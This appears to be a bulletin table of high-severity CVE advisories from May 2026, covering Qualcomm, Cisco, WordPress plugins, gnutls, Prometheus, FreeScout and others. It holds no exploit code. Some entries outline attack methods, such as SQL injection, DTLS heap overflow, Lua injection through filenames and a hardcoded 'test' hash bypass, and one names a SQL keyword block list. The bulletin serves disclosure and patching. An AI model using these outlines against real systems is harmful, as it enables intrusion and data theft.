| Qualcomm, Inc.--Snapdragon | Memory corruption when processing camera sensor input/output control codes with invalid output buffers. | 2026-05-04 | 7.8 | CVE-2025-47405 | https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption while creating a process on the digital signal processor due to allocation failure at the kernel level. | 2026-05-04 | 7.8 | CVE-2025-47407 | https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2026-bulletin.html |
| Qualcomm, Inc.--Snapdragon | Memory corruption when another driver calls an IOCTL with invalid input/output buffer. | 2026-05-04 | 7.8 | CVE-2025-47408 | https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2026-bulletin.html |
| WPMart--Team Member | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WPMart Team Member allows Blind SQL Injection. This issue affects Team Member: from n/a through 8.5. | 2026-05-07 | 7.6 | CVE-2025-68060 | https://patchstack.com/database/wordpress/plugin/team-showcase-supreme/vulnerability/wordpress-team-member-plugin-8-5-sql-injection-vulnerability?_s_id=cve |
| Unisoc (Shanghai) Technologies Co., Ltd.--SC7731E/SC9832E/SC9863A/T310/T610/T618/T7200/T7225/T7250/T7255/T7280/T7300/T8100/T9100/T8200/T8300 | In IMS, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. | 2026-05-06 | 7.5 | CVE-2025-71251 | https://www.unisoc.com/en/support/product-security-bulletin/2051836844671422466 |
| Unisoc (Shanghai) Technologies Co., Ltd.--SC7731E/SC9832E/SC9863A/T310/T610/T618/T7200/T7225/T7250/T7255/T7280/T7300/T8100/T9100/T8200/T8300 | In Modem IMS, there is a possible improper input validation. This could lead to remote denial of service with no additional execution privileges needed. | 2026-05-06 | 7.5 | CVE-2025-71252 | https://www.unisoc.com/en/support/product-security-bulletin/2051836844671422466 |
| Unisoc (Shanghai) Technologies Co., Ltd.--SC7731E/SC9832E/SC9863A/T310/T610/T618/T7200/T7225/T7250/T7255/T7280/T7300/T8100/T9100/T8200/T8300 | In Modem IMS, there is a possible improper input validation. This could lead to remote denial of service with no additional execution privileges needed. | 2026-05-06 | 7.5 | CVE-2025-71253 | https://www.unisoc.com/en/support/product-security-bulletin/2051836844671422466 |
| Unisoc (Shanghai) Technologies Co., Ltd.--SC7731E/SC9832E/SC9863A/T310/T610/T618/T7200/T7225/T7250/T7255/T7280/T7300/T8100/T9100/T8200/T8300 | In Modem IMS, there is a possible improper input validation. This could lead to remote denial of service with no additional execution privileges needed. | 2026-05-06 | 7.5 | CVE-2025-71254 | https://www.unisoc.com/en/support/product-security-bulletin/2051836844671422466 |
| Unisoc (Shanghai) Technologies Co., Ltd.--SC7731E/SC9832E/SC9863A/T310/T610/T618/T7200/T7225/T7250/T7255/T7280/T7300/T8100/T9100/T8200/T8300 | In Modem IMS, there is a possible improper input validation. This could lead to remote denial of service with no additional execution privileges needed. | 2026-05-06 | 7.5 | CVE-2025-71255 | https://www.unisoc.com/en/support/product-security-bulletin/2051836844671422466 |
| Unisoc (Shanghai) Technologies Co., Ltd.--T8100/T9100/T8200/T8300 | In nr modem, there is a possible improper input validation. This could lead to remote denial of service with no additional execution privileges needed. | 2026-05-06 | 7.5 | CVE-2025-71256 | https://www.unisoc.com/en/support/product-security-bulletin/2051836844671422466 |
| GravityMore--Gravity Bookings | The Gravity Bookings Premium plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 2.5.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-06 | 7.5 | CVE-2026-1719 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ce032abe-ee9d-4be1-ac97-5fa95d598e85?source=cve https://gravitybooking.com/ |
| Cisco--Cisco Unity Connection | A vulnerability in the web UI of Cisco Unity Connection Web Inbox could allow an unauthenticated, remote attacker to conduct SSRF attacks through an affected device. This vulnerability is due to improper input validation for specific HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to send arbitrary network requests that are sourced from the affected device. | 2026-05-06 | 7.2 | CVE-2026-20035 | cisco-sa-unity-rce-ssrf-hENhuASy |
| Cisco--Cisco IoT Field Network Director (IoT-FND) | A vulnerability in the web-based management interface of Cisco IoT Field Network Director could allow an authenticated, remote attacker with low privileges to cause a DoS condition on a remotely managed router. This vulnerability is due to improper error handling. An attacker could exploit this vulnerability by submitting crafted input to the web-based management interface. A successful exploit could allow the attacker to request unauthorized files from a remote router, causing the router to reload and resulting in a DoS condition. | 2026-05-06 | 7.7 | CVE-2026-20167 | cisco-sa-iot-fnd-dos-n8N26Q4u |
| Cisco--Cisco Small Business Smart and Managed Switches | A vulnerability in the Simple Network Management Protocol (SNMP) subsystem of Cisco 350 Series Managed Switches (SG350) and Cisco 350X Series Stackable Managed Switches (SG350X) firmware could allow an authenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper error handling when parsing response data for a specific SNMP request. An attacker could exploit this vulnerability by sending a specific SNMP request to an affected device. A successful exploit could allow the attacker to cause the device to reload unexpectedly, resulting in a DoS condition. This vulnerability affects SNMP versions 1, 2c, and 3. To exploit this vulnerability through SNMPv2c or earlier, the attacker must know a valid read-write or read-only SNMP community string for the affected system. To exploit this vulnerability through SNMPv3, the attacker must have valid SNMP user credentials for the affected system. | 2026-05-06 | 7.7 | CVE-2026-20185 | cisco-sa-sg350-snmp-dos-GEFZr2Tj |
| Cisco--Cisco Crosswork Network Change Automation | A vulnerability in the connection-handling mechanism of Cisco Crosswork Network Controller (CNC) and Cisco Network Services Orchestrator (NSO) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected system. This vulnerability is due to an inadequate implementation of rate-limiting on incoming network connections. An attacker could exploit this vulnerability by sending a large number of connection requests to an affected system. A successful exploit could allow the attacker to exhaust available connection resources, causing Cisco CNC and Cisco NSO to become unresponsive and resulting in a DoS condition for legitimate users and dependent services. A manual reboot of the system is required to recover from this condition. | 2026-05-06 | 7.5 | CVE-2026-20188 | cisco-sa-nso-dos-7Egqyc |
| Meta--react-server-dom-turbopack | A denial of service vulnerability could be triggered by sending specially crafted HTTP requests to server function endpoints, this could lead to server crashes, out-of-memory exceptions or excessive CPU usage; affecting the following packages: react-server-dom-webpack, react-server-dom-parcel, react-server-dom-turbopack (versions 19.0.0 through 19.0.5, 19.1.0 through 19.1.6, and 19.2.0 through 19.2.5). | 2026-05-06 | 7.5 | CVE-2026-23870 | https://github.com/facebook/react/security/advisories/GHSA-rv78-f8rc-xrxh |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when copying data from a freed source while executing performance counter deselect operation. | 2026-05-04 | 7.8 | CVE-2026-24082 | https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2026-bulletin.html |
| Jules Colle--Conditional Fields for Contact Form 7 | Conditional Fields for Contact Form 7 WordPress plugin through version 2.6.7 contains an uncontrolled resource consumption vulnerability in the Wpcf7cfMailParser class where the hide_hidden_mail_fields_regex_callback() method reads an iteration count directly from user-supplied POST parameters without validation or upper bound enforcement. Unauthenticated attackers can supply an arbitrarily large integer value through the REST API endpoint to cause unbounded loop execution with multiple preg_replace() operations, exhausting server memory and crashing the PHP process. | 2026-05-04 | 7.5 | CVE-2026-25863 | https://wordpress.org/plugins/cf7-conditional-fields/#developers https://www.vulncheck.com/advisories/conditional-fields-for-contact-form-7-dos-via-uncontrolled-resource-consumption |
| Microsoft--Microsoft 365 Copilot's Business Chat | Improper neutralization of special elements in M365 Copilot allows an unauthorized attacker to disclose information over a network. | 2026-05-07 | 7.5 | CVE-2026-26129 | M365 Copilot Information Disclosure Vulnerability |
| Microsoft--Microsoft 365 Copilot's Business Chat | Improper neutralization of special elements in output used by a downstream component ('injection') in M365 Copilot allows an unauthorized attacker to disclose information over a network. | 2026-05-07 | 7.5 | CVE-2026-26164 | M365 Copilot Information Disclosure Vulnerability |
| Profelis Information and Consulting Trade and Industry Limited Company--SambaBox | Improper Control of Generation of Code ('Code Injection') vulnerability in Profelis Information and Consulting Trade and Industry Limited Company SambaBox allows OS Command Injection. This issue affects SambaBox: from 5.1 before 5.3. | 2026-05-04 | 7.2 | CVE-2026-3120 | https://www.usom.gov.tr/bildirim/tr-26-0155 |
| Scott Paterson--easy-paypal-events-tickets | Easy PayPal Events & Tickets plugin for WordPress versions 1.3 and earlier contain a hardcoded authentication bypass vulnerability in the QR code scanning functionality that allows unauthenticated remote attackers to bypass hash verification by supplying 'test' as the hash parameter. Attackers can access the vulnerable endpoint via the add_wpeevent_button_qr action to retrieve sensitive order details including PayPal transaction IDs, customer email addresses, purchase amounts, and ticket information for any order with a known or guessed post ID. This plugin was officially closed as of 2026-03-18. | 2026-05-04 | 7.5 | CVE-2026-32834 | https://gist.github.com/4lec4st/eb20f9934f8c23b4b241f74a8d884ce9 https://wordpress.org/plugins/easy-paypal-events-tickets https://www.vulncheck.com/advisories/easy-paypal-events-tickets-authentication-bypass-via-qr-code-scanning |
| Microsoft--Copilot Chat (Microsoft Edge) | Improper neutralization of special elements used in a command ('command injection') in Copilot Chat (Microsoft Edge) allows an unauthorized attacker to disclose information over a network. | 2026-05-07 | 7.5 | CVE-2026-33111 | Copilot Chat (Microsoft Edge) Information Disclosure Vulnerability |
| 10web--Form Maker by 10Web Mobile-Friendly Drag & Drop Contact Form Builder | The Form Maker by 10Web - Mobile-Friendly Drag & Drop Contact Form Builder plugin for WordPress is vulnerable to SQL Injection via the 'inputs' parameter in versions up to, and including, 1.15.42 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-05 | 7.5 | CVE-2026-3359 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f37cc880-d8a4-431a-9639-abf01163030a?source=cve https://plugins.trac.wordpress.org/changeset/3518461/form-maker |
| Red Hat--Red Hat Hardened Images | A heap buffer overflow vulnerability exists in the DTLS handshake fragment reassembly logic of GnuTLS. The issue arises in merge_handshake_packet() where incoming handshake fragments are matched and merged based solely on handshake type, without validating that the message_length field remains consistent across all fragments of the same logical message. An attacker can exploit this by sending crafted DTLS fragments with conflicting message_length values, causing the implementation to allocate a buffer based on a smaller initial fragment and subsequently write beyond its bounds using larger, inconsistent fragments. Because the merge operation does not enforce proper bounds checking against the allocated buffer size, this results in an out-of-bounds write on the heap. The vulnerability is remotely exploitable without authentication via the DTLS handshake path and can lead to application crashes or potential memory corruption. | 2026-05-04 | 7.5 | CVE-2026-33846 | RHSA-2026:13274 https://access.redhat.com/security/cve/CVE-2026-33846 RHBZ#2450625 |
| Akamai--Guardicore Platform Agent | Akamai Guardicore Platform Agent (GPA) and Zero Trust Client on Linux and macOS allow TOCTOU-based local privilege escalation. The GPA service creates an IPC socket in the world-writable /tmp directory. It accepts unauthenticated IPC control messages. This enables a TOCTOU vulnerability in the HandleSaveLogs() function of the GPA service, by creating a log file and manipulating it into a symlink that points to the targeted path; this can allow an unprivileged local user to make arbitrary root-owned files world-writable. In addition, a diagnostic collection tool (gimmelogs) running with root privileges was vulnerable to command injection from the dbstore, offering a second privilege escalation vector. (On Windows, gimmelogs does not have command injection but does allow writing a ZIP archive to an unintended location.) This affects Akamai Guardicore Platform Agent 7.0 through 7.3.1 and Akamai Zero Trust Client 6.0 through 6.1.5. | 2026-05-08 | 7.4 | CVE-2026-34354 | https://www.akamai.com/blog/security-research/advisory-cve-2026-34354-guardicore-local-privilege-escalation |
| ahmadgb--GeekyBot AI Copilot, Chatbot, WooCommerce Lead Gen & Zero-Prompt Content | The GeekyBot - Generate AI Content Without Prompt, Chatbot and Lead Generation plugin for WordPress is vulnerable to SQL Injection via the 'attributekey' parameter in versions up to, and including, 1.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-05 | 7.5 | CVE-2026-3456 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4c716fd3-6297-4b3a-a796-65f68f2986cf?source=cve https://plugins.trac.wordpress.org/changeset/3474168/geeky-bot |
| Hikvision--DS-3E1310P-SI | Some Hikvision switch products (discontinued since December 2023) are vulnerable to authenticated remote command execution due to insufficient input validation. Attackers with valid credentials can exploit this flaw by sending crafted packets containing malicious commands to affected devices, leading to arbitrary command execution. | 2026-05-09 | 7.2 | CVE-2026-3828 | https://www.hikvision.com/en/support/cybersecurity/security-advisory/command-execution-vulnerability-in-some-hikvision-switch-product/ |
| OpenStack--Cyborg | OpenStack Cyborg before 16.0.1 uses rule:allow (check_str='@') as the default policy for multiple API endpoints. This unconditionally authorizes any request carrying a valid Keystone token regardless of roles, project membership, or scope. An authenticated user with zero role assignments can complete various actions such as reprogramming FPGA bitstreams on arbitrary compute nodes via agent RPC. | 2026-05-07 | 7.4 | CVE-2026-40213 | https://bugs.launchpad.net/openstack-cyborg/+bug/2143263 https://www.openwall.com/lists/oss-security/2026/05/07/6 https://security.openstack.org/ossa/OSSA-2026-011.html |
| Spring--Spring Cloud Config | When using Google Secrets Manager as a backend for the Spring Cloud Config server a client can craft a request to the config server potentially exposing secrets from unintended GCP projects. Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3.1.14 or greater (Enterprise Support Only). Spring Cloud Config 4.1.x: affected from 4.1.0 through 4.1.9 (inclusive); upgrade to 4.1.10 or greater (Enterprise Support Only). Spring Cloud Config 4.2.x: affected from 4.2.0 through 4.2.6 (inclusive); upgrade to 4.2.7 or greater (Enterprise Support Only). Spring Cloud Config 4.3.x: affected from 4.3.0 through 4.3.2 (inclusive); upgrade to 4.3.3 or greater. Spring Cloud Config 5.0.x: affected from 5.0.0 through 5.0.2 (inclusive); upgrade to 5.0.3 or greater. | 2026-05-07 | 7.5 | CVE-2026-40981 | https://spring.io/security/cve-2026-40981 |
| Spring--Spring Cloud Config | The base directory (`spring.cloud.config.server.git.basedir`) used by the Spring Cloud Config Server to clone Git repositories to is susceptible to time-of-check-time-of-use (TOCTOU) attacks. Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3.1.14 or greater (Enterprise Support Only). Spring Cloud Config 4.1.x: affected from 4.1.0 through 4.1.9 (inclusive); upgrade to 4.1.10 or greater (Enterprise Support Only). Spring Cloud Config 4.2.x: affected from 4.2.0 through 4.2.6 (inclusive); upgrade to 4.2.7 or greater (Enterprise Support Only). Spring Cloud Config 4.3.x: affected from 4.3.0 through 4.3.2 (inclusive); upgrade to 4.3.3 or greater. Spring Cloud Config 5.0.x: affected from 5.0.0 through 5.0.2 (inclusive); upgrade to 5.0.3 or greater. | 2026-05-07 | 7.4 | CVE-2026-41002 | https://spring.io/security/cve-2026-41002 |
| harttle--liquidjs | LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to version 10.25.7, a circular block reference in {% layout %} / {% block %} causes an infinite recursive loop, consuming all available memory (~4GB) and crashing the Node.js process with FATAL ERROR: JavaScript heap out of memory. This allows any user who can submit a Liquid template to perform a Denial of Service attack. This issue has been patched in version 10.25.7. | 2026-05-09 | 7.5 | CVE-2026-41311 | https://github.com/harttle/liquidjs/security/advisories/GHSA-4rc3-7j7w-m548 https://github.com/harttle/liquidjs/commit/e2311dfd6e82f73509308aa8a3a1fafc92e226f0 https://github.com/harttle/liquidjs/releases/tag/v10.25.7 |
| QuantumNous--new-api | New API is a large language model (LLM) gateway and artificial intelligence (AI) asset management system. Prior to version 0.12.10, a vulnerability exists in the Stripe webhook handler that allows an unauthenticated attacker to forge webhook events and credit arbitrary quota to their account without making any payment. This issue has been patched in version 0.12.10. | 2026-05-08 | 7.1 | CVE-2026-41432 | https://github.com/QuantumNous/new-api/security/advisories/GHSA-xff3-5c9p-2mr4 https://github.com/QuantumNous/new-api/releases/tag/v0.12.10 |
| Scott Paterson--easy-paypal-events-tickets | Easy PayPal Events & Tickets plugin for WordPress versions 1.3 and earlier contain an information disclosure vulnerability in the QR code scanning endpoint that allows unauthenticated attackers to enumerate and retrieve all customer order records. Attackers can iterate over sequential WordPress post IDs through the scan_qr.php endpoint to harvest the complete set of orders stored in the database without requiring authentication or prior knowledge of specific order identifiers. This plugin was officially closed as of 2026-03-18. | 2026-05-04 | 7.5 | CVE-2026-41471 | https://gist.github.com/4lec4st/9fd04b4bfadb3f7e388f61588f5f2564 https://wordpress.org/plugins/easy-paypal-events-tickets https://www.vulncheck.com/advisories/easy-paypal-events-tickets-information-disclosure-via-qr-code-endpoint |
| cilium--cilium | Cilium is a networking, observability, and security solution with an eBPF-based dataplane. Prior to versions 1.17.15, 1.18.9, and 1.19.3, the output of cilium-bugtool can contain sensitive data when the tool is run against Cilium deployments with WireGuard encryption enabled. This issue has been patched in versions 1.17.15, 1.18.9, and 1.19.3. | 2026-05-08 | 7.9 | CVE-2026-41520 | https://github.com/cilium/cilium/security/advisories/GHSA-gj49-89wh-h4gj https://github.com/cilium/cilium/releases/tag/v1.17.15 https://github.com/cilium/cilium/releases/tag/v1.18.9 https://github.com/cilium/cilium/releases/tag/v1.19.3 |
| Bricks--Bricks Builder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bricks Builder allows Reflected XSS. This issue affects Bricks Builder: from n/a through 1.9.2 to 2.2. | 2026-05-07 | 7.1 | CVE-2026-41554 | https://patchstack.com/database/wordpress/theme/bricks/vulnerability/wordpress-bricks-builder-theme-1-9-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| sebastianbergmann--phpunit | PHPUnit is a testing framework for PHP. In versions 12.5.21 and 13.1.5, PHPUnit forwards PHP INI settings to child processes (used for isolated/PHPT test execution) as -d name=value command-line arguments without neutralizing INI metacharacters. Because PHP's INI parser interprets " as a string delimiter, ; as the start of a comment, and most importantly a newline as a directive separator, a value containing a newline is parsed by the child process as multiple INI directives. An attacker able to influence a single INI value can therefore inject arbitrary additional directives into the child's configuration, including auto_prepend_file, extension, disable_functions, open_basedir, and others. Setting auto_prepend_file to an attacker-controlled path yields remote code execution in the child process. This issue has been patched in versions 12.5.22 and 13.1.6. | 2026-05-08 | 7.8 | CVE-2026-41570 | https://github.com/sebastianbergmann/phpunit/security/advisories/GHSA-qrr6-mg7r-m243 https://github.com/sebastianbergmann/phpunit/pull/6592 |
| Ajax30--BraveCMS-2.0 | Brave CMS is an open-source CMS. Prior to commit 6c56603, the contact form is publicly accessible (no authentication required). User-supplied message text is passed through PHP's nl2br() function, which converts newlines to <br> tags but does not escape HTML. The resulting string is then rendered in a Blade email template using the unescaped {!! $msg !!} directive. Because HTML is not sanitized, arbitrary markup can be injected into the email body. While modern HTML-capable email clients (Gmail or Outlook Web) typically block JavaScript execution, they still render HTML content. This allows attackers to craft convincing phishing interfaces inside the email sent to the administrator. This issue has been patched via commit 6c56603. | 2026-05-08 | 7.1 | CVE-2026-41576 | https://github.com/Ajax30/BraveCMS-2.0/security/advisories/GHSA-x7cg-8grr-grvx https://github.com/Ajax30/BraveCMS-2.0/commit/6c5660373cf5f0ca9181603280427aca46ef11ea |
| nocobase--nocobase | NocoBase is an AI-powered no-code/low-code platform for building business applications and enterprise solutions. Prior to version 2.0.39, the queryParentSQL() function in the core database package constructs a recursive CTE query by joining nodeIds with string concatenation instead of using parameterized queries. The nodeIds array contains primary key values read from database rows. An attacker who can create a record with a malicious string primary key can inject arbitrary SQL when any subsequent request triggers recursive eager loading on that collection. This issue has been patched in version 2.0.39. | 2026-05-07 | 7.5 | CVE-2026-41640 | https://github.com/nocobase/nocobase/security/advisories/GHSA-4948-f92q-f432 https://github.com/nocobase/nocobase/pull/9133 https://github.com/nocobase/nocobase/commit/202e2b8efe44ba90adbf1087f6f70881ff947604 https://github.com/nocobase/nocobase/releases/tag/v2.0.39 |
| nocobase--nocobase | NocoBase is an AI-powered no-code/low-code platform for building business applications and enterprise solutions. Prior to version 2.0.39, the checkSQL() validation function that blocks dangerous SQL keywords (e.g., pg_read_file, LOAD_FILE, dblink) is applied on the collections:create and sqlCollection:execute endpoints but is entirely missing on the sqlCollection:update endpoint. An attacker with collection management permissions can create a SQL collection with benign SQL, then update it with arbitrary SQL that bypasses all validation, and query the collection to execute the injected SQL and exfiltrate data. This issue has been patched in version 2.0.39. | 2026-05-07 | 7.2 | CVE-2026-41641 | https://github.com/nocobase/nocobase/security/advisories/GHSA-wrwh-c28m-9jjh https://github.com/nocobase/nocobase/pull/9134 https://github.com/nocobase/nocobase/commit/851aee543efa894142e0f7be03eb55d9cec06a91 https://github.com/nocobase/nocobase/releases/tag/v2.0.39 |
| osrg--gobgp | GoBGP is an open source Border Gateway Protocol (BGP) implementation in the Go Programming Language. In version 4.3.0, a remote Denial of Service (DoS) vulnerability exists in GoBGP due to a nil pointer dereference. When a malformed BGP UPDATE message contains an unrecognized Path Attribute marked as "Well-known," the daemon fails to interrupt the message handling flow. This results in an illegal memory access and a full process crash (panic). This issue has been patched in version 4.4.0. | 2026-05-07 | 7.5 | CVE-2026-41642 | https://github.com/osrg/gobgp/security/advisories/GHSA-7235-89m6-f4px https://github.com/osrg/gobgp/releases/tag/v4.4.0 |
| osrg--gobgp | GoBGP is an open source Border Gateway Protocol (BGP) implementation in the Go Programming Language. Prior to version 4.3.0, a remote Denial of Service (DoS) vulnerability exists in GoBGP where a malformed BGP UPDATE message can trigger a runtime error: index out of range panic. This occurs during the processing of 4-byte AS attributes when the message structure causes an internal slice index shift that is not properly handled. This issue has been patched in version 4.3.0. | 2026-05-07 | 7.5 | CVE-2026-41643 | https://github.com/osrg/gobgp/security/advisories/GHSA-8rxh-r2p6-7f2q https://github.com/osrg/gobgp/releases/tag/v4.3.0 |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, a logic error in Admidio's two-factor authentication reset inverts the authorization check. Non-admin users cannot remove their own TOTP configuration, but they can remove other users' TOTP, including administrators. A group leader with profile edit rights on an admin account can strip that admin's 2FA. This issue has been patched in version 5.0.9. | 2026-05-07 | 7.1 | CVE-2026-41660 | https://github.com/Admidio/admidio/security/advisories/GHSA-rh3w-4ccx-prf9 https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| ellite--Wallos | Wallos is an open-source, self-hostable personal subscription tracker. In versions 4.8.4 and prior, the incomplete SSRF fix in Wallos validates webhook URLs via gethostbyname() but passes the original hostname to cURL without CURLOPT_RESOLVE pinning on 10 of 11 outbound HTTP endpoints, leaving a DNS rebinding TOCTOU window. At time of publication, there are no publicly available patches. | 2026-05-07 | 7.7 | CVE-2026-41688 | https://github.com/ellite/Wallos/security/advisories/GHSA-h4g7-xv3v-q73g https://github.com/ellite/Wallos/commit/e87387f0ebb540cd33e6dfda7181db9db650ecef |
| locize--locize | locize is a localization platform that connects code and i18n setup. Prior to version 4.0.21, the locize client SDK registers a window.addEventListener("message", …) handler that dispatches to registered internal handlers (editKey, commitKey, commitKeys, isLocizeEnabled, requestInitialize, …) without validating event.origin. The pre-patch listener in src/api/postMessage.js gates dispatch on event.data.sender === "i18next-editor-frame" - that value sits inside the attacker-controlled message payload, not the browser-enforced origin. Any web page that could embed or be embedded by a locize-enabled host - an iframe on a third-party page, a window.open-ed victim, a parent frame reaching down - could send a crafted postMessage and trigger the internal handlers. This issue has been patched in version 4.0.21. | 2026-05-08 | 7.5 | CVE-2026-41886 | https://github.com/locize/locize/security/advisories/GHSA-w937-fg2h-xhq2 https://github.com/locize/locize/releases/tag/v4.0.21 |
| freescout-help-desk--freescout | FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to version 1.8.217, a user with updateAutoReply permission can store an XSS payload in the mailbox auto-reply message. The payload is rendered unescaped in the auto-reply email sent to every customer who contacts the mailbox. Email clients do not enforce CSP, so the payload executes in the customer's webmail / mail-client context. This issue has been patched in version 1.8.217. | 2026-05-07 | 7.6 | CVE-2026-41904 | https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-q3fh-rj9h-jfrc https://github.com/freescout-help-desk/freescout/releases/tag/1.8.217 |
| freescout-help-desk--freescout | FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to version 1.8.217, Helper::sanitizeRemoteUrl() in app/Misc/Helper.php follows HTTP redirects via curlGetLastRedirectedUrl() but then re-validates the original URL instead of the final redirect destination. An attacker who can supply any URL that passes the initial host check can redirect FreeScout to internal HTTP services (cloud metadata, internal APIs, RFC1918 ranges) that would normally be blocked. This issue has been patched in version 1.8.217. | 2026-05-07 | 7.7 | CVE-2026-41905 | https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-22wf-848c-c856 https://github.com/freescout-help-desk/freescout/releases/tag/1.8.217 |
| freescout-help-desk--freescout | FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to version 1.8.214, the Change Customer modal correctly hides out-of-scope customers through the mailbox-filtered search endpoint, but the backend conversation_change_customer action accepts any supplied customer_email. A low-privileged agent can forge a request and bind a visible conversation to a hidden customer in another mailbox. This issue has been patched in version 1.8.214. | 2026-05-07 | 7.1 | CVE-2026-41906 | https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-p6hg-2cwg-rrx9 https://github.com/freescout-help-desk/freescout/releases/tag/1.8.214 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in gnutls. Servers configured with RSA-PSK (Rivest-Shamir-Adleman - Pre-Shared Key) wrongfully matched usernames containing a NUL character with truncated usernames. A remote attacker could exploit this by sending a specially crafted username, leading to an authentication bypass. This vulnerability allows an attacker to gain unauthorized access by circumventing the authentication process. | 2026-05-07 | 7.1 | CVE-2026-42010 | https://access.redhat.com/security/cve/CVE-2026-42010 RHBZ#2467289 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in gnutls. This vulnerability occurs because permitted name constraints were incorrectly ignored when previous Certificate Authorities (CAs) only had excluded name constraints. A remote attacker could exploit this to bypass critical name constraint checks during certificate validation. This bypass could lead to the acceptance of invalid certificates, potentially enabling spoofing or man-in-the-middle attacks against affected systems. | 2026-05-07 | 7.4 | CVE-2026-42011 | https://access.redhat.com/security/cve/CVE-2026-42011 RHBZ#2467437 |
| prometheus--prometheus | Prometheus is an open-source monitoring system and time series database. Prior to versions 3.5.3 and 3.11.3, the client_secret field in the Azure AD remote write OAuth configuration (storage/remote/azuread) was typed as string instead of Secret. Prometheus redacts fields of type Secret when serving the configuration via the /-/config HTTP API endpoint. Because the field was a plain string, the Azure OAuth client secret was exposed in plaintext to any user or process with access to that endpoint. This issue has been patched in versions 3.5.3 and 3.11.3. | 2026-05-04 | 7.5 | CVE-2026-42151 | https://github.com/prometheus/prometheus/security/advisories/GHSA-wg65-39gg-5wfj https://github.com/prometheus/prometheus/pull/18587 https://github.com/prometheus/prometheus/pull/18590 https://github.com/prometheus/prometheus/releases/tag/v3.11.3 https://github.com/prometheus/prometheus/releases/tag/v3.5.3 |
| prometheus--prometheus | Prometheus is an open-source monitoring system and time series database. Prior to versions 3.5.3 and 3.11.3, the remote read endpoint (/api/v1/read) does not validate the declared decoded length in a snappy-compressed request body before allocating memory. An unauthenticated attacker can send a small payload that causes a huge heap allocation per request. Under concurrent load this can exhaust available memory and crash the Prometheus process. This issue has been patched in versions 3.5.3 and 3.11.3. | 2026-05-04 | 7.5 | CVE-2026-42154 | https://github.com/prometheus/prometheus/security/advisories/GHSA-8rm2-7qqf-34qm https://github.com/prometheus/prometheus/pull/18584 https://github.com/prometheus/prometheus/pull/18585 https://github.com/prometheus/prometheus/releases/tag/v3.11.3 https://github.com/prometheus/prometheus/releases/tag/v3.5.3 |
| Eugeny--russh | Russh is a Rust SSH client & server library. Prior to version 0.60.1, a pre-authentication denial-of-service vulnerability exists in the server's keyboard-interactive authentication handler. A malicious client can crash any russh-based server that implements keyboard-interactive auth (e.g., for 2FA/TOTP) with a single malformed packet, requiring no credentials. This issue has been patched in version 0.60.1. | 2026-05-08 | 7.5 | CVE-2026-42189 | https://github.com/Eugeny/russh/security/advisories/GHSA-f5v4-2wr6-hqmg https://github.com/Eugeny/russh/commit/6c3c80a9b6d60763d6227d60fa8310e57172a4d1 https://github.com/Eugeny/russh/releases/tag/v0.60.1 |
| dail8859--NotepadNext | Notepad Next is a cross-platform reimplementation of Notepad++. Prior to version 0.14, NotepadNext's detectLanguageFromExtension() function interpolates a file's extension directly into a Lua script without sanitization. An attacker can craft a filename whose extension contains Lua code, which executes automatically when the victim opens the file in NotepadNext. Because luaL_openlibs() is called unconditionally, the full os, io, and package libraries are available to the injected code, enabling arbitrary command execution. This issue has been patched in version 0.14. | 2026-05-07 | 7.8 | CVE-2026-42214 | https://github.com/dail8859/NotepadNext/security/advisories/GHSA-m5fq-c9x5-w54g https://github.com/dail8859/NotepadNext/commit/f3ca1b10aca52f05fd7f4f5ebf9b566d6cd95ccc https://github.com/dail8859/NotepadNext/releases/tag/v0.14 |
| Icinga--ipl-web | ipl/web is a set of common web components for php projects. Prior to version 0.13.1, the vulnerability allows an attacker to inject malicious Javascript into a victim's browser to run it in the context of Icinga Web. The victim needs to visit a specifically prepared website and may have no immediate chance to notice any wrongdoing. This issue has been patched in version 0.13.1. | 2026-05-08 | 7.6 | CVE-2026-42224 | https://github.com/Icinga/ipl-web/security/advisories/GHSA-55wf-5m3q-6jjf https://github.com/Icinga/ipl-web/commit/f387e92504d7a03bb857d1aee9b7410e06dd065d https://github.com/Icinga/ipl-web/releases/tag/v0.13.1 |
